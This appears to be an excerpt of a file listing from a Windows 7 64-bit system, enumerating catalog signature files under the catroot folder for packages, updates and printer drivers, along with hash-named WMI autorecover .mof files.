- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-VirtualXP-Licensing-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-WindowsFoundation-LanguagePack-Package~31bf3856ad364e35~amd64~en-US~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-WindowsFoundation-LanguagePack-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-WindowsMediaPlayer-Troubleshooters-Package~31bf3856ad364e35~amd64~en-US~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-WindowsMediaPlayer-Troubleshooters-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-WindowsMediaPlayer-Troubleshooters-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-WindowsMediaPlayer-Troubleshooters-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-WinOcr-Package~31bf3856ad364e35~amd64~en-US~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-WinOcr-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-WinOcr-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-WinOcr-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-WMI-SNMP-Provider-Package~31bf3856ad364e35~amd64~en-US~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-WMI-SNMP-Provider-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-WMI-SNMP-Provider-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-WMI-SNMP-Provider-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-WMPNetworkSharingService-Package~31bf3856ad364e35~amd64~en-US~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-WMPNetworkSharingService-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-WMPNetworkSharingService-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-WMPNetworkSharingService-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Xps-Foundation-Client-Package~31bf3856ad364e35~amd64~en-US~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Xps-Foundation-Client-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Xps-Foundation-Client-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Xps-Foundation-Client-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Networking-MPSSVC-Rules-BusinessEdition-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Networking-MPSSVC-Rules-BusinessEdition-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Networking-MPSSVC-Rules-EnterpriseEdition-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Networking-MPSSVC-Rules-EnterpriseEdition-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Networking-MPSSVC-Rules-HomeBasicEdition-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Networking-MPSSVC-Rules-HomeBasicEdition-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Networking-MPSSVC-Rules-HomePremiumEdition-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Networking-MPSSVC-Rules-HomePremiumEdition-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Networking-MPSSVC-Rules-StarterEdition-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Networking-MPSSVC-Rules-StarterEdition-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Networking-MPSSVC-Rules-UltimateEdition-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Networking-MPSSVC-Rules-UltimateEdition-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\nt5.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\ntexe.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\ntpe.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\ntph.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\ntprint.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB2534111~31bf3856ad364e35~amd64~~6.1.1.0.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB2999226~31bf3856ad364e35~amd64~~6.1.1.5.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB2999226~31bf3856ad364e35~amd64~~6.1.1.7.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB976902~31bf3856ad364e35~amd64~~6.1.1.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2534111_SP1~31bf3856ad364e35~amd64~~6.1.1.0.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2534111~31bf3856ad364e35~amd64~~6.1.1.0.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2999226_RTM~31bf3856ad364e35~amd64~~6.1.1.5.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2999226_SP1~31bf3856ad364e35~amd64~~6.1.1.7.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2999226~31bf3856ad364e35~amd64~~6.1.1.5.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2999226~31bf3856ad364e35~amd64~~6.1.1.7.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB958488~31bf3856ad364e35~amd64~~6.2.7600.16513.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB976902_RTM~31bf3856ad364e35~amd64~~6.1.1.17514.cat
- <SYSTEM32>\wbem\autorecover\37e0c717ae20a6fdb871c2a6135a17bb.mof
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB976902~31bf3856ad364e35~amd64~~6.1.1.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB976932~31bf3856ad364e35~amd64~~6.1.0.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB976933~31bf3856ad364e35~amd64~de-DE~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB976933~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB976933~31bf3856ad364e35~amd64~es-ES~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB976933~31bf3856ad364e35~amd64~fr-FR~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB976933~31bf3856ad364e35~amd64~ja-JP~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB976933~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnbr002.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnbr003.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnbr004.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnbr005.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnbr006.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnbr007.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnbr008.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnbr009.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnbr00a.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnca003.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnca00a.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnca00b.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnca00c.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnca00d.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnca00e.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnca00f.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnca00g.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnca00h.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnca00i.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnca00x.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnca00y.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnca00z.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnep002.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnep003.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnep004.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnep005.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnep00a.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnep00b.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnep00c.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnep00d.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnep00e.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnep00f.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnep00g.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnep00l.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnfx002.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnge001.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prngt002.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prngt003.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prngt004.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnhp002.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnhp003.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnhp004.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnhp005.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnin002.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnin003.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnin004.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnkm002.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnkm003.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnkm004.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnkm005.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnky002.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnky003.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnky004.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnky005.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnky006.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnky007.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnky008.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnky009.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnle002.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnle003.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnle004.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnlx002.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnlx003.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnlx004.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnlx005.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnlx006.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnlx007.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnlx008.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnlx009.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnlx00a.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnlx00b.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnlx00c.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnlx00d.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnlx00e.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnlx00v.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnlx00w.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnlx00x.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnlx00y.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnlx00z.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnms002.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnnr002.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnnr003.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnnr004.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnod002.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnok002.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnrc002.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnrc003.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnrc004.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnrc005.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnrc006.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnrc007.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnrc00a.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnrc00b.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnrc00c.cat
- <SYSTEM32>\wbem\autorecover\37e521ea22b4da2b1800b420c18aaa06.mof
- <SYSTEM32>\wbem\autorecover\38c9522219d2d176a21e27697653d791.mof
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnsa002.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnsh002.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnso002.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnsv002.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnsv003.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnsv004.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnts002.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnts003.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnxx002.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Server-Help-Package.ClientEnterprise~31bf3856ad364e35~amd64~en-US~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Server-Help-Package.ClientEnterprise~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Server-Help-Package.ClientEnterprise~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Server-Help-Package.ClientEnterprise~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Server-Help-Package.ClientHomeBasic~31bf3856ad364e35~amd64~en-US~6.1.7600.16385.cat
- <SYSTEM32>\wbem\autorecover\38ee6c630467a006990c5977c3058c94.mof
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Server-Help-Package.ClientHomeBasic~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <SYSTEM32>\wbem\autorecover\3a2ae58aef9cc0eb792c27376b83b742.mof
- <SYSTEM32>\wbem\autorecover\3a6b10c0999f6b4d983db39f5662d188.mof
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Server-Help-Package.ClientHomeBasic~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Server-Help-Package.ClientHomeBasic~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Server-Help-Package.ClientHomePremium~31bf3856ad364e35~amd64~en-US~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Server-Help-Package.ClientHomePremium~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Server-Help-Package.ClientHomePremium~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Server-Help-Package.ClientHomePremium~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Server-Help-Package.ClientProfessional~31bf3856ad364e35~amd64~en-US~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Server-Help-Package.ClientProfessional~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Server-Help-Package.ClientProfessional~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Server-Help-Package.ClientProfessional~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Server-Help-Package.ClientStarter~31bf3856ad364e35~amd64~en-US~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Server-Help-Package.ClientStarter~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Server-Help-Package.ClientStarter~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\wbem\autorecover\3b834cda050e2eb727d59e88093736c1.mof
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Server-Help-Package.ClientStarter~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\wbem\autorecover\3bf83b7b3e923e93576a1e90f1249961.mof
- <SYSTEM32>\wbem\autorecover\3c8e8de80475a06bf6bd04ed233384f6.mof
- <SYSTEM32>\wbem\autorecover\3dc0babdca20e5e319117c21bd4bd795.mof
- <SYSTEM32>\wbem\autorecover\3e1f437b15d56d45f33eb785458b8600.mof
- <SYSTEM32>\wbem\autorecover\3e2eea84b9c48dacd55f3e7ef12ac696.mof
- <SYSTEM32>\wbem\autorecover\3edc3f5a95d3a0fdfe1f87c15dc9636a.mof
- <SYSTEM32>\wbem\autorecover\3f12846693b6d2695ee73b3b19a07731.mof
- <SYSTEM32>\wbem\autorecover\3fa3650b664bc96a8672ec85a7ae4225.mof
- <SYSTEM32>\wbem\autorecover\408a41276c89c2b6de58cb3f870d81fd.mof
- <SYSTEM32>\wbem\autorecover\40cc62b2df1fd889c724db25c65242cb.mof
- <SYSTEM32>\wbem\autorecover\41648fa3af58f3aca0843f25fc7b4d28.mof
- <SYSTEM32>\wbem\autorecover\42355e8e232ef8cadd187d531dec55dd.mof
- <SYSTEM32>\wbem\autorecover\427e6239479ea0b6e63b8ea07e427621.mof
- <SYSTEM32>\wbem\autorecover\42c894eeacad83a4e41154685841b3e1.mof
- <SYSTEM32>\wbem\autorecover\43a7eee279f15546ee900076ca8cc2c8.mof
- <SYSTEM32>\wbem\autorecover\43af8f4749656456f363eca1d9b30b00.mof
- <SYSTEM32>\wbem\autorecover\440d61aff6e7de917af4be1c22d9d054.mof
- <SYSTEM32>\wbem\autorecover\451233ed13e097000776690b79d8d753.mof
- <SYSTEM32>\wbem\autorecover\453fdaef36543c53b0df0151a3bf061c.mof
- <SYSTEM32>\wbem\autorecover\463359d6a0af7ad4a7feeb49c546d383.mof
- <SYSTEM32>\wbem\autorecover\46c527299f2e9ddecc22ba2a87940869.mof
- <SYSTEM32>\wbem\autorecover\47718c3a6a4b53be19715214fe7fe71d.mof
- <SYSTEM32>\wbem\autorecover\47894aa8e985d224eed927c27aa713d9.mof
- <SYSTEM32>\wbem\autorecover\478ab8d1ce47620f40853d13db6a8fc1.mof
- <SYSTEM32>\wbem\autorecover\48134d587d2340358ee47eb1450e518d.mof
- <SYSTEM32>\wbem\autorecover\481d6bae8a26a21c63ebe5b995854440.mof
- <SYSTEM32>\wbem\autorecover\4862ed894479a5b4c9e04f7504c76c19.mof
- <SYSTEM32>\wbem\autorecover\4890ca3549e41cb53cf3d2a881580352.mof
- <SYSTEM32>\wbem\autorecover\4894f8c0597ec686997fc4aa95d6a7e1.mof
- <SYSTEM32>\wbem\autorecover\494c62faa08cd5217399baa555ff491b.mof
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Server-Help-Package.ClientUltimate~31bf3856ad364e35~amd64~en-US~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Server-Help-Package.ClientUltimate~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Server-Help-Package.ClientUltimate~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Server-Help-Package.ClientUltimate~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
